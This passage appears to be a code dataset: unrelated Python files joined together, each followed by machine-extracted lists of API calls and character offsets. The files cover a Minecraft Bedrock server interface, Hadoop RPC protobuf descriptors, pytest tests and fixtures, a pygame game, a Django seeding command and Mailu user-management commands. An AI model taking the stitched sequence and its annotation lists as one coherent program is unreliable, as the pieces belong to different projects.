print(f'[Packet]: {hex(batch[0])}')
self.server.players[connection.address.token].handle_packet(batch)
def on_new_incoming_connection(self, connection: object) -> None:
self.server.players[connection.address.token]: object = bedrock_player(connection, self.server)
self.server.players[connection.address.token].entity_id: int = self.server.current_entity_id
self.server.current_entity_id += 1
self.set_count(len(self.server.players))
self.server.logger.info(f"{connection.address.token} connected.")
def on_disconnect(self, connection: object) -> None:
del self.server.players[connection.address.token]
self.set_count(len(self.server.players))
self.server.logger.info(f"{connection.address.token} disconnected.")
def start_interface(self) -> None:
self.stopped: bool = False
self.start()
def stop_interface(self) -> None:
self.stopped: bool = True
def run(self):
while not self.stopped:
self.rak_net_server.handle()
| [
"rak_net.server.server",
"player.bedrock_player.bedrock_player",
"packet.mcbe.game_packet.game_packet"
] | [((2822, 2929), 'rak_net.server.server', 'rak_net_server', (["server.config.data['ip_address']['hostname']", "server.config.data['ip_address']['port']"], {}), "(server.config.data['ip_address']['hostname'], server.config.\n data['ip_address']['port'])\n", (2836, 2929), True, 'from rak_net.server import server as rak_net_server\n'), ((4635, 4674), 'player.bedrock_player.bedrock_player', 'bedrock_player', (['connection', 'self.server'], {}), '(connection, self.server)\n', (4649, 4674), False, 'from player.bedrock_player import bedrock_player\n'), ((4183, 4207), 'packet.mcbe.game_packet.game_packet', 'game_packet', (['packet.body'], {}), '(packet.body)\n', (4194, 4207), False, 'from packet.mcbe.game_packet import game_packet\n')] |
# Generated by the protocol buffer compiler. DO NOT EDIT!
from google.protobuf import descriptor
from google.protobuf import message
from google.protobuf import reflection
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
DESCRIPTOR = descriptor.FileDescriptor(
name='RpcPayloadHeader.proto',
package='',
serialized_pb='\n\x16RpcPayloadHeader.proto\"q\n\x15RpcPayloadHeaderProto\x12\x1e\n\x07rpcKind\x18\x01 \x01(\x0e\x32\r.RpcKindProto\x12(\n\x05rpcOp\x18\x02 \x01(\x0e\x32\x19.RpcPayloadOperationProto\x12\x0e\n\x06\x63\x61llId\x18\x03 \x02(\r\"f\n\x16RpcResponseHeaderProto\x12\x0e\n\x06\x63\x61llId\x18\x01 \x02(\r\x12\x1f\n\x06status\x18\x02 \x02(\x0e\x32\x0f.RpcStatusProto\x12\x1b\n\x13serverIpcVersionNum\x18\x03 \x01(\r*J\n\x0cRpcKindProto\x12\x0f\n\x0bRPC_BUILTIN\x10\x00\x12\x10\n\x0cRPC_WRITABLE\x10\x01\x12\x17\n\x13RPC_PROTOCOL_BUFFER\x10\x02*i\n\x18RpcPayloadOperationProto\x12\x15\n\x11RPC_FINAL_PAYLOAD\x10\x00\x12\x1c\n\x18RPC_CONTINUATION_PAYLOAD\x10\x01\x12\x18\n\x14RPC_CLOSE_CONNECTION\x10\x02*3\n\x0eRpcStatusProto\x12\x0b\n\x07SUCCESS\x10\x00\x12\t\n\x05\x45RROR\x10\x01\x12\t\n\x05\x46\x41TAL\x10\x02\x42;\n\x1eorg.apache.hadoop.ipc.protobufB\x16RpcPayloadHeaderProtos\xa0\x01\x01')
_RPCKINDPROTO = descriptor.EnumDescriptor(
name='RpcKindProto',
full_name='RpcKindProto',
filename=None,
file=DESCRIPTOR,
values=[
descriptor.EnumValueDescriptor(
name='RPC_BUILTIN', index=0, number=0,
options=None,
type=None),
descriptor.EnumValueDescriptor(
name='RPC_WRITABLE', index=1, number=1,
options=None,
type=None),
descriptor.EnumValueDescriptor(
name='RPC_PROTOCOL_BUFFER', index=2, number=2,
options=None,
type=None),
],
containing_type=None,
options=None,
serialized_start=245,
serialized_end=319,
)
_RPCPAYLOADOPERATIONPROTO = descriptor.EnumDescriptor(
name='RpcPayloadOperationProto',
full_name='RpcPayloadOperationProto',
filename=None,
file=DESCRIPTOR,
values=[
descriptor.EnumValueDescriptor(
name='RPC_FINAL_PAYLOAD', index=0, number=0,
options=None,
type=None),
descriptor.EnumValueDescriptor(
name='RPC_CONTINUATION_PAYLOAD', index=1, number=1,
options=None,
type=None),
descriptor.EnumValueDescriptor(
name='RPC_CLOSE_CONNECTION', index=2, number=2,
options=None,
type=None),
],
containing_type=None,
options=None,
serialized_start=321,
serialized_end=426,
)
_RPCSTATUSPROTO = descriptor.EnumDescriptor(
name='RpcStatusProto',
full_name='RpcStatusProto',
filename=None,
file=DESCRIPTOR,
values=[
descriptor.EnumValueDescriptor(
name='SUCCESS', index=0, number=0,
options=None,
type=None),
descriptor.EnumValueDescriptor(
name='ERROR', index=1, number=1,
options=None,
type=None),
descriptor.EnumValueDescriptor(
name='FATAL', index=2, number=2,
options=None,
type=None),
],
containing_type=None,
options=None,
serialized_start=428,
serialized_end=479,
)
RPC_BUILTIN = 0
RPC_WRITABLE = 1
RPC_PROTOCOL_BUFFER = 2
RPC_FINAL_PAYLOAD = 0
RPC_CONTINUATION_PAYLOAD = 1
RPC_CLOSE_CONNECTION = 2
SUCCESS = 0
ERROR = 1
FATAL = 2
_RPCPAYLOADHEADERPROTO = descriptor.Descriptor(
name='RpcPayloadHeaderProto',
full_name='RpcPayloadHeaderProto',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(
name='rpcKind', full_name='RpcPayloadHeaderProto.rpcKind', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
descriptor.FieldDescriptor(
name='rpcOp', full_name='RpcPayloadHeaderProto.rpcOp', index=1,
number=2, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
descriptor.FieldDescriptor(
name='callId', full_name='RpcPayloadHeaderProto.callId', index=2,
number=3, type=13, cpp_type=3, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=26,
serialized_end=139,
)
_RPCRESPONSEHEADERPROTO = descriptor.Descriptor(
name='RpcResponseHeaderProto',
full_name='RpcResponseHeaderProto',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(
name='callId', full_name='RpcResponseHeaderProto.callId', index=0,
number=1, type=13, cpp_type=3, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
descriptor.FieldDescriptor(
name='status', full_name='RpcResponseHeaderProto.status', index=1,
number=2, type=14, cpp_type=8, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
descriptor.FieldDescriptor(
name='serverIpcVersionNum', full_name='RpcResponseHeaderProto.serverIpcVersionNum', index=2,
number=3, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=141,
serialized_end=243,
)
_RPCPAYLOADHEADERPROTO.fields_by_name['rpcKind'].enum_type = _RPCKINDPROTO
_RPCPAYLOADHEADERPROTO.fields_by_name['rpcOp'].enum_type = _RPCPAYLOADOPERATIONPROTO
_RPCRESPONSEHEADERPROTO.fields_by_name['status'].enum_type = _RPCSTATUSPROTO
DESCRIPTOR.message_types_by_name['RpcPayloadHeaderProto'] = _RPCPAYLOADHEADERPROTO
DESCRIPTOR.message_types_by_name['RpcResponseHeaderProto'] = _RPCRESPONSEHEADERPROTO
class RpcPayloadHeaderProto(message.Message):
__metaclass__ = reflection.GeneratedProtocolMessageType
DESCRIPTOR = _RPCPAYLOADHEADERPROTO
# @@protoc_insertion_point(class_scope:RpcPayloadHeaderProto)
class RpcResponseHeaderProto(message.Message):
__metaclass__ = reflection.GeneratedProtocolMessageType
DESCRIPTOR = _RPCRESPONSEHEADERPROTO
# @@protoc_insertion_point(class_scope:RpcResponseHeaderProto)
# @@protoc_insertion_point(module_scope)
| [
"google.protobuf.descriptor.EnumValueDescriptor",
"google.protobuf.descriptor.FieldDescriptor",
"google.protobuf.descriptor.FileDescriptor"
] | [((269, 1219), 'google.protobuf.descriptor.FileDescriptor', 'descriptor.FileDescriptor', ([], {'name': '"""RpcPayloadHeader.proto"""', 'package': '""""""', 'serialized_pb': '\'\\n\\x16RpcPayloadHeader.proto"q\\n\\x15RpcPayloadHeaderProto\\x12\\x1e\\n\\x07rpcKind\\x18\\x01 \\x01(\\x0e2\\r.RpcKindProto\\x12(\\n\\x05rpcOp\\x18\\x02 \\x01(\\x0e2\\x19.RpcPayloadOperationProto\\x12\\x0e\\n\\x06callId\\x18\\x03 \\x02(\\r"f\\n\\x16RpcResponseHeaderProto\\x12\\x0e\\n\\x06callId\\x18\\x01 \\x02(\\r\\x12\\x1f\\n\\x06status\\x18\\x02 \\x02(\\x0e2\\x0f.RpcStatusProto\\x12\\x1b\\n\\x13serverIpcVersionNum\\x18\\x03 \\x01(\\r*J\\n\\x0cRpcKindProto\\x12\\x0f\\n\\x0bRPC_BUILTIN\\x10\\x00\\x12\\x10\\n\\x0cRPC_WRITABLE\\x10\\x01\\x12\\x17\\n\\x13RPC_PROTOCOL_BUFFER\\x10\\x02*i\\n\\x18RpcPayloadOperationProto\\x12\\x15\\n\\x11RPC_FINAL_PAYLOAD\\x10\\x00\\x12\\x1c\\n\\x18RPC_CONTINUATION_PAYLOAD\\x10\\x01\\x12\\x18\\n\\x14RPC_CLOSE_CONNECTION\\x10\\x02*3\\n\\x0eRpcStatusProto\\x12\\x0b\\n\\x07SUCCESS\\x10\\x00\\x12\\t\\n\\x05ERROR\\x10\\x01\\x12\\t\\n\\x05FATAL\\x10\\x02B;\\n\\x1eorg.apache.hadoop.ipc.protobufB\\x16RpcPayloadHeaderProtos\\xa0\\x01\\x01\''}), '(name=\'RpcPayloadHeader.proto\', package=\'\',\n serialized_pb=\n \'\\n\\x16RpcPayloadHeader.proto"q\\n\\x15RpcPayloadHeaderProto\\x12\\x1e\\n\\x07rpcKind\\x18\\x01 \\x01(\\x0e2\\r.RpcKindProto\\x12(\\n\\x05rpcOp\\x18\\x02 \\x01(\\x0e2\\x19.RpcPayloadOperationProto\\x12\\x0e\\n\\x06callId\\x18\\x03 \\x02(\\r"f\\n\\x16RpcResponseHeaderProto\\x12\\x0e\\n\\x06callId\\x18\\x01 \\x02(\\r\\x12\\x1f\\n\\x06status\\x18\\x02 \\x02(\\x0e2\\x0f.RpcStatusProto\\x12\\x1b\\n\\x13serverIpcVersionNum\\x18\\x03 \\x01(\\r*J\\n\\x0cRpcKindProto\\x12\\x0f\\n\\x0bRPC_BUILTIN\\x10\\x00\\x12\\x10\\n\\x0cRPC_WRITABLE\\x10\\x01\\x12\\x17\\n\\x13RPC_PROTOCOL_BUFFER\\x10\\x02*i\\n\\x18RpcPayloadOperationProto\\x12\\x15\\n\\x11RPC_FINAL_PAYLOAD\\x10\\x00\\x12\\x1c\\n\\x18RPC_CONTINUATION_PAYLOAD\\x10\\x01\\x12\\x18\\n\\x14RPC_CLOSE_CONNECTION\\x10\\x02*3\\n\\x0eRpcStatusProto\\x12\\x0b\\n\\x07SUCCESS\\x10\\x00\\x12\\t\\n\\x05ERROR\\x10\\x01\\x12\\t\\n\\x05FATAL\\x10\\x02B;\\n\\x1eorg.apache.hadoop.ipc.protobufB\\x16RpcPayloadHeaderProtos\\xa0\\x01\\x01\'\n )\n', (294, 1219), False, 'from google.protobuf import descriptor\n'), ((1394, 1492), 'google.protobuf.descriptor.EnumValueDescriptor', 'descriptor.EnumValueDescriptor', ([], {'name': '"""RPC_BUILTIN"""', 'index': '(0)', 'number': '(0)', 'options': 'None', 'type': 'None'}), "(name='RPC_BUILTIN', index=0, number=0,\n options=None, type=None)\n", (1424, 1492), False, 'from google.protobuf import descriptor\n'), ((1513, 1612), 'google.protobuf.descriptor.EnumValueDescriptor', 'descriptor.EnumValueDescriptor', ([], {'name': '"""RPC_WRITABLE"""', 'index': '(1)', 'number': '(1)', 'options': 'None', 'type': 'None'}), "(name='RPC_WRITABLE', index=1, number=1,\n options=None, type=None)\n", (1543, 1612), False, 'from google.protobuf import descriptor\n'), ((1633, 1740), 'google.protobuf.descriptor.EnumValueDescriptor', 'descriptor.EnumValueDescriptor', ([], {'name': '"""RPC_PROTOCOL_BUFFER"""', 'index': '(2)', 'number': '(2)', 'options': 'None', 'type': 'None'}), "(name='RPC_PROTOCOL_BUFFER', index=2, number=\n 2, options=None, type=None)\n", (1663, 1740), False, 'from google.protobuf import descriptor\n'), ((2032, 2136), 'google.protobuf.descriptor.EnumValueDescriptor', 'descriptor.EnumValueDescriptor', ([], {'name': '"""RPC_FINAL_PAYLOAD"""', 'index': '(0)', 'number': '(0)', 'options': 'None', 'type': 'None'}), "(name='RPC_FINAL_PAYLOAD', index=0, number=0,\n options=None, type=None)\n", (2062, 2136), False, 'from google.protobuf import descriptor\n'), ((2157, 2268), 'google.protobuf.descriptor.EnumValueDescriptor', 'descriptor.EnumValueDescriptor', ([], {'name': '"""RPC_CONTINUATION_PAYLOAD"""', 'index': '(1)', 'number': '(1)', 'options': 'None', 'type': 'None'}), "(name='RPC_CONTINUATION_PAYLOAD', index=1,\n number=1, options=None, type=None)\n", (2187, 2268), False, 'from google.protobuf import descriptor\n'), ((2289, 2397), 'google.protobuf.descriptor.EnumValueDescriptor', 'descriptor.EnumValueDescriptor', ([], {'name': '"""RPC_CLOSE_CONNECTION"""', 'index': '(2)', 'number': '(2)', 'options': 'None', 'type': 'None'}), "(name='RPC_CLOSE_CONNECTION', index=2, number\n =2, options=None, type=None)\n", (2319, 2397), False, 'from google.protobuf import descriptor\n'), ((2659, 2754), 'google.protobuf.descriptor.EnumValueDescriptor', 'descriptor.EnumValueDescriptor', ([], {'name': '"""SUCCESS"""', 'index': '(0)', 'number': '(0)', 'options': 'None', 'type': 'None'}), "(name='SUCCESS', index=0, number=0, options=\n None, type=None)\n", (2689, 2754), False, 'from google.protobuf import descriptor\n'), ((2774, 2867), 'google.protobuf.descriptor.EnumValueDescriptor', 'descriptor.EnumValueDescriptor', ([], {'name': '"""ERROR"""', 'index': '(1)', 'number': '(1)', 'options': 'None', 'type': 'None'}), "(name='ERROR', index=1, number=1, options=\n None, type=None)\n", (2804, 2867), False, 'from google.protobuf import descriptor\n'), ((2887, 2980), 'google.protobuf.descriptor.EnumValueDescriptor', 'descriptor.EnumValueDescriptor', ([], {'name': '"""FATAL"""', 'index': '(2)', 'number': '(2)', 'options': 'None', 'type': 'None'}), "(name='FATAL', index=2, number=2, options=\n None, type=None)\n", (2917, 2980), False, 'from google.protobuf import descriptor\n'), ((3451, 3757), 'google.protobuf.descriptor.FieldDescriptor', 'descriptor.FieldDescriptor', ([], {'name': '"""rpcKind"""', 'full_name': '"""RpcPayloadHeaderProto.rpcKind"""', 'index': '(0)', 'number': '(1)', 'type': '(14)', 'cpp_type': '(8)', 'label': '(1)', 'has_default_value': '(False)', 'default_value': '(0)', 'message_type': 'None', 'enum_type': 'None', 'containing_type': 'None', 'is_extension': '(False)', 'extension_scope': 'None', 'options': 'None'}), "(name='rpcKind', full_name=\n 'RpcPayloadHeaderProto.rpcKind', index=0, number=1, type=14, cpp_type=8,\n label=1, has_default_value=False, default_value=0, message_type=None,\n enum_type=None, containing_type=None, is_extension=False,\n extension_scope=None, options=None)\n", (3477, 3757), False, 'from google.protobuf import descriptor\n'), ((3783, 4085), 'google.protobuf.descriptor.FieldDescriptor', 'descriptor.FieldDescriptor', ([], {'name': '"""rpcOp"""', 'full_name': '"""RpcPayloadHeaderProto.rpcOp"""', 'index': '(1)', 'number': '(2)', 'type': '(14)', 'cpp_type': '(8)', 'label': '(1)', 'has_default_value': '(False)', 'default_value': '(0)', 'message_type': 'None', 'enum_type': 'None', 'containing_type': 'None', 'is_extension': '(False)', 'extension_scope': 'None', 'options': 'None'}), "(name='rpcOp', full_name=\n 'RpcPayloadHeaderProto.rpcOp', index=1, number=2, type=14, cpp_type=8,\n label=1, has_default_value=False, default_value=0, message_type=None,\n enum_type=None, containing_type=None, is_extension=False,\n extension_scope=None, options=None)\n", (3809, 4085), False, 'from google.protobuf import descriptor\n'), ((4111, 4415), 'google.protobuf.descriptor.FieldDescriptor', 'descriptor.FieldDescriptor', ([], {'name': '"""callId"""', 'full_name': '"""RpcPayloadHeaderProto.callId"""', 'index': '(2)', 'number': '(3)', 'type': '(13)', 'cpp_type': '(3)', 'label': '(2)', 'has_default_value': '(False)', 'default_value': '(0)', 'message_type': 'None', 'enum_type': 'None', 'containing_type': 'None', 'is_extension': '(False)', 'extension_scope': 'None', 'options': 'None'}), "(name='callId', full_name=\n 'RpcPayloadHeaderProto.callId', index=2, number=3, type=13, cpp_type=3,\n label=2, has_default_value=False, default_value=0, message_type=None,\n enum_type=None, containing_type=None, is_extension=False,\n extension_scope=None, options=None)\n", (4137, 4415), False, 'from google.protobuf import descriptor\n'), ((4807, 5112), 'google.protobuf.descriptor.FieldDescriptor', 'descriptor.FieldDescriptor', ([], {'name': '"""callId"""', 'full_name': '"""RpcResponseHeaderProto.callId"""', 'index': '(0)', 'number': '(1)', 'type': '(13)', 'cpp_type': '(3)', 'label': '(2)', 'has_default_value': '(False)', 'default_value': '(0)', 'message_type': 'None', 'enum_type': 'None', 'containing_type': 'None', 'is_extension': '(False)', 'extension_scope': 'None', 'options': 'None'}), "(name='callId', full_name=\n 'RpcResponseHeaderProto.callId', index=0, number=1, type=13, cpp_type=3,\n label=2, has_default_value=False, default_value=0, message_type=None,\n enum_type=None, containing_type=None, is_extension=False,\n extension_scope=None, options=None)\n", (4833, 5112), False, 'from google.protobuf import descriptor\n'), ((5138, 5443), 'google.protobuf.descriptor.FieldDescriptor', 'descriptor.FieldDescriptor', ([], {'name': '"""status"""', 'full_name': '"""RpcResponseHeaderProto.status"""', 'index': '(1)', 'number': '(2)', 'type': '(14)', 'cpp_type': '(8)', 'label': '(2)', 'has_default_value': '(False)', 'default_value': '(0)', 'message_type': 'None', 'enum_type': 'None', 'containing_type': 'None', 'is_extension': '(False)', 'extension_scope': 'None', 'options': 'None'}), "(name='status', full_name=\n 'RpcResponseHeaderProto.status', index=1, number=2, type=14, cpp_type=8,\n label=2, has_default_value=False, default_value=0, message_type=None,\n enum_type=None, containing_type=None, is_extension=False,\n extension_scope=None, options=None)\n", (5164, 5443), False, 'from google.protobuf import descriptor\n'), ((5469, 5802), 'google.protobuf.descriptor.FieldDescriptor', 'descriptor.FieldDescriptor', ([], {'name': '"""serverIpcVersionNum"""', 'full_name': '"""RpcResponseHeaderProto.serverIpcVersionNum"""', 'index': '(2)', 'number': '(3)', 'type': '(13)', 'cpp_type': '(3)', 'label': '(1)', 'has_default_value': '(False)', 'default_value': '(0)', 'message_type': 'None', 'enum_type': 'None', 'containing_type': 'None', 'is_extension': '(False)', 'extension_scope': 'None', 'options': 'None'}), "(name='serverIpcVersionNum', full_name=\n 'RpcResponseHeaderProto.serverIpcVersionNum', index=2, number=3, type=\n 13, cpp_type=3, label=1, has_default_value=False, default_value=0,\n message_type=None, enum_type=None, containing_type=None, is_extension=\n False, extension_scope=None, options=None)\n", (5495, 5802), False, 'from google.protobuf import descriptor\n')] |
from dirs import User
def test_config_home():
assert User.config_home().is_dir()
def test_cache_home():
assert User.cache_home().is_dir()
def test_data_home():
assert User.data_home().is_dir()
def test_data(user: User):
assert user.data == User.data_home()
def test_config(user: User):
assert user.config == User.config_home()
assert user.config.is_dir()
def test_cache(user: User):
assert user.cache == User.cache_home()
assert user.config.is_dir() | [
"dirs.User.data_home",
"dirs.User.cache_home",
"dirs.User.config_home"
] | [((264, 280), 'dirs.User.data_home', 'User.data_home', ([], {}), '()\n', (278, 280), False, 'from dirs import User\n'), ((338, 356), 'dirs.User.config_home', 'User.config_home', ([], {}), '()\n', (354, 356), False, 'from dirs import User\n'), ((444, 461), 'dirs.User.cache_home', 'User.cache_home', ([], {}), '()\n', (459, 461), False, 'from dirs import User\n'), ((59, 77), 'dirs.User.config_home', 'User.config_home', ([], {}), '()\n', (75, 77), False, 'from dirs import User\n'), ((123, 140), 'dirs.User.cache_home', 'User.cache_home', ([], {}), '()\n', (138, 140), False, 'from dirs import User\n'), ((185, 201), 'dirs.User.data_home', 'User.data_home', ([], {}), '()\n', (199, 201), False, 'from dirs import User\n')] |
# -*- coding: utf-8 -*-
"""
-------------------------------------------------
File Name: alien_invasion
Description : 武装飞船:游戏入口 !!!
Author : cat
date: 2018/1/22
-------------------------------------------------
Change Activity:
2018/1/22:
-------------------------------------------------
"""
import logging
import pygame
from armed import game_functions as gf
from armed.settings import Settings
from armed.ship import Ship
# 设置log 显示的最低级别
logging.getLogger().setLevel(logging.DEBUG)
def run_game():
# 初始化游戏并创建一个屏幕对象
pygame.init()
# width_height = (1200,800)
bg_color = (230, 230, 230)
ai_settings = Settings()
screen = pygame.display.set_mode((ai_settings.screen_width, ai_settings.screen_height))
pygame.display.set_caption("Alien Invasion")
ship = Ship(screen)
# 开始游戏的主循环🐖
while True:
# 监视键盘和鼠标事件
gf.check_events(ship)
ship.update(ai_settings)
# 每次循环都绘制屏幕
gf.update_screen(ai_settings, screen, ship)
if __name__ == "__main__":
run_game()
| [
"logging.getLogger",
"pygame.init",
"pygame.display.set_mode",
"armed.game_functions.check_events",
"armed.settings.Settings",
"pygame.display.set_caption",
"armed.game_functions.update_screen",
"armed.ship.Ship"
] | [((586, 599), 'pygame.init', 'pygame.init', ([], {}), '()\n', (597, 599), False, 'import pygame\n'), ((681, 691), 'armed.settings.Settings', 'Settings', ([], {}), '()\n', (689, 691), False, 'from armed.settings import Settings\n'), ((706, 784), 'pygame.display.set_mode', 'pygame.display.set_mode', (['(ai_settings.screen_width, ai_settings.screen_height)'], {}), '((ai_settings.screen_width, ai_settings.screen_height))\n', (729, 784), False, 'import pygame\n'), ((789, 833), 'pygame.display.set_caption', 'pygame.display.set_caption', (['"""Alien Invasion"""'], {}), "('Alien Invasion')\n", (815, 833), False, 'import pygame\n'), ((846, 858), 'armed.ship.Ship', 'Ship', (['screen'], {}), '(screen)\n', (850, 858), False, 'from armed.ship import Ship\n'), ((499, 518), 'logging.getLogger', 'logging.getLogger', ([], {}), '()\n', (516, 518), False, 'import logging\n'), ((920, 941), 'armed.game_functions.check_events', 'gf.check_events', (['ship'], {}), '(ship)\n', (935, 941), True, 'from armed import game_functions as gf\n'), ((1003, 1046), 'armed.game_functions.update_screen', 'gf.update_screen', (['ai_settings', 'screen', 'ship'], {}), '(ai_settings, screen, ship)\n', (1019, 1046), True, 'from armed import game_functions as gf\n')] |
"""snakeoil-based pytest fixtures"""
import pytest
from . import random_str
class TempDir:
"""Provide temporary directory to every test method."""
@pytest.fixture(autouse=True)
def __setup(self, tmpdir):
self.dir = str(tmpdir)
class RandomPath:
"""Provide random path in a temporary directory to every test method."""
@pytest.fixture(autouse=True)
def __setup(self, tmpdir):
self.path = str(tmpdir.join(random_str(10)))
| [
"pytest.fixture"
] | [((161, 189), 'pytest.fixture', 'pytest.fixture', ([], {'autouse': '(True)'}), '(autouse=True)\n', (175, 189), False, 'import pytest\n'), ((355, 383), 'pytest.fixture', 'pytest.fixture', ([], {'autouse': '(True)'}), '(autouse=True)\n', (369, 383), False, 'import pytest\n')] |
from django.core.management.base import BaseCommand, CommandError
#Fixture package
from mixer.backend.django import mixer
#Test package & Utils
from django.test import TestCase
import pytest
import time, random
#models
from applications.brandcolors.models import Startup
from applications.brandcolors.models import StartupColor
from applications.brandcolors.models import Fabric
from mixer.backend.django import mixer
from django.contrib.auth.models import User
try:
from secrets import choice
except:
from random import choice
from random import randint
import json
from pprint import pprint
from webcolors import hex_to_rgb
class Command(BaseCommand):
from faker import Factory
fake = Factory.create()
from mixer.backend.django import mixer
help = 'Seeding the database'
def handle(self, *args, **options):
start = time.clock()
Startup.objects.all().delete()
StartupColor.objects.all().delete()
Fabric.objects.all().delete()
self.stdout.write(
self.style.SUCCESS(
'Successfully Delete the Models \n\tNumber of users in the db: {} '.format(User.objects.all().count())
)
)
try:
#admin user
user=User.objects.create_user('admin', password='(<PASSWORD>)')
user.is_superuser=True
user.save()
# create 15 users
mixer.cycle(15).blend(User)
except:
pass
users = User.objects.all()
with open('fixtures/brandcolors.json') as data_file:
data = json.load(data_file)
#import pdb; pdb.set_trace()
for brand in data:
#startup
source_url = data.get(brand).get('source_url')
# import pytest; pytest.set_trace()
Startup.objects.create(
title = str(data.get(brand).get('title')),
slug = data.get(brand).get('slug'),
source_url = data.get(brand).get('source_url'),
brand_url = data.get(brand).get('brand_url')
)
brand_name = Startup.objects.last()
from pprint import pprint
pprint(data.get(brand).get('title'))
colors = data.get(brand).get('colors')
for color in colors:
r,g,b = hex_to_rgb('#'+color)
StartupColor.objects.create(color='#'+color, startup=brand_name, red=r, green=g, blue=b)
self.stdout.write(
self.style.SUCCESS(
'Successfully Seeding Models \n\tNumber of users in the db: %s ' % len(users)
)
)
# Time elapse
end = time.clock()
hours = end//3600
end = end - 3600*hours
minutes = end//60
seconds = end - 60*minutes
self.stdout.write(
self.style.SUCCESS(
'Created a User < admin > with password < (<PASSWORD>) > for you to login.'
)
)
# Time elapse
self.stdout.write(
self.style.SUCCESS(
'\n\nTime elapse: %d:%d:%d' %(hours,minutes,seconds)
)
)
'''
from applications.brandcolors.models import Gallery as StartupProductImage
pic = StartupProductImage.objects.last().picture
images = StartupProductImage.objects.all()
for i in images:
i.picture = pic
i.save()
from random import shuffle
startups = ['Facebook', 'Twitter', 'Amazon', 'NBA', 'NFL']
products = StartupProduct.objects.all()
for product in products:
shuffle(startups)
product.title = product.title + ' ' + startups[0]
product.save()
'''
| [
"applications.brandcolors.models.Fabric.objects.all",
"applications.brandcolors.models.StartupColor.objects.create",
"time.clock",
"webcolors.hex_to_rgb",
"applications.brandcolors.models.Startup.objects.all",
"applications.brandcolors.models.StartupColor.objects.all",
"mixer.backend.django.mixer.cycle"... | [((715, 731), 'faker.Factory.create', 'Factory.create', ([], {}), '()\n', (729, 731), False, 'from faker import Factory\n'), ((867, 879), 'time.clock', 'time.clock', ([], {}), '()\n', (877, 879), False, 'import time, random\n'), ((1505, 1523), 'django.contrib.auth.models.User.objects.all', 'User.objects.all', ([], {}), '()\n', (1521, 1523), False, 'from django.contrib.auth.models import User\n'), ((2701, 2713), 'time.clock', 'time.clock', ([], {}), '()\n', (2711, 2713), False, 'import time, random\n'), ((1266, 1324), 'django.contrib.auth.models.User.objects.create_user', 'User.objects.create_user', (['"""admin"""'], {'password': '"""(<PASSWORD>)"""'}), "('admin', password='(<PASSWORD>)')\n", (1290, 1324), False, 'from django.contrib.auth.models import User\n'), ((1605, 1625), 'json.load', 'json.load', (['data_file'], {}), '(data_file)\n', (1614, 1625), False, 'import json\n'), ((2131, 2153), 'applications.brandcolors.models.Startup.objects.last', 'Startup.objects.last', ([], {}), '()\n', (2151, 2153), False, 'from applications.brandcolors.models import Startup\n'), ((888, 909), 'applications.brandcolors.models.Startup.objects.all', 'Startup.objects.all', ([], {}), '()\n', (907, 909), False, 'from applications.brandcolors.models import Startup\n'), ((927, 953), 'applications.brandcolors.models.StartupColor.objects.all', 'StartupColor.objects.all', ([], {}), '()\n', (951, 953), False, 'from applications.brandcolors.models import StartupColor\n'), ((971, 991), 'applications.brandcolors.models.Fabric.objects.all', 'Fabric.objects.all', ([], {}), '()\n', (989, 991), False, 'from applications.brandcolors.models import Fabric\n'), ((2351, 2374), 'webcolors.hex_to_rgb', 'hex_to_rgb', (["('#' + color)"], {}), "('#' + color)\n", (2361, 2374), False, 'from webcolors import hex_to_rgb\n'), ((2389, 2483), 'applications.brandcolors.models.StartupColor.objects.create', 'StartupColor.objects.create', ([], {'color': "('#' + color)", 'startup': 'brand_name', 'red': 'r', 'green': 'g', 'blue': 'b'}), "(color='#' + color, startup=brand_name, red=r,\n green=g, blue=b)\n", (2416, 2483), False, 'from applications.brandcolors.models import StartupColor\n'), ((1427, 1442), 'mixer.backend.django.mixer.cycle', 'mixer.cycle', (['(15)'], {}), '(15)\n', (1438, 1442), False, 'from mixer.backend.django import mixer\n'), ((1151, 1169), 'django.contrib.auth.models.User.objects.all', 'User.objects.all', ([], {}), '()\n', (1167, 1169), False, 'from django.contrib.auth.models import User\n')] |
from mailu import app, manager, db
from mailu.admin import models
@manager.command
def admin(localpart, domain_name, password):
""" Create an admin user
"""
domain = models.Domain.query.get(domain_name)
if not domain:
domain = models.Domain(name=domain_name)
db.session.add(domain)
user = models.User(
localpart=localpart,
domain=domain,
global_admin=True
)
user.set_password(password)
db.session.add(user)
db.session.commit()
@manager.command
def user(localpart, domain_name, password, hash_scheme=app.config['PASSWORD_SCHEME']):
""" Create a user
"""
domain = models.Domain.query.get(domain_name)
if not domain:
domain = models.Domain(name=domain_name)
db.session.add(domain)
user = models.User(
localpart=localpart,
domain=domain,
global_admin=False
)
user.set_password(password, hash_scheme=hash_scheme)
db.session.add(user)
db.session.commit()
@manager.command
def user_import(localpart, domain_name, password_hash, hash_scheme=app.config['PASSWORD_SCHEME']):
""" Import a user along with password hash. Available hashes:
'SHA512-CRYPT'
'SHA256-CRYPT'
'MD5-CRYPT'
'CRYPT'
"""
domain = models.Domain.query.get(domain_name)
if not domain:
domain = models.Domain(name=domain_name)
db.session.add(domain)
user = models.User(
localpart=localpart,
domain=domain,
global_admin=False
)
user.set_password(password_hash, hash_scheme=hash_scheme, raw=True)
db.session.add(user)
db.session.commit()
@manager.command
def config_update(delete_objects=False):
"""sync configuration with data from YAML-formatted stdin"""
import yaml, sys
new_config=yaml.load(sys.stdin)
# print new_config
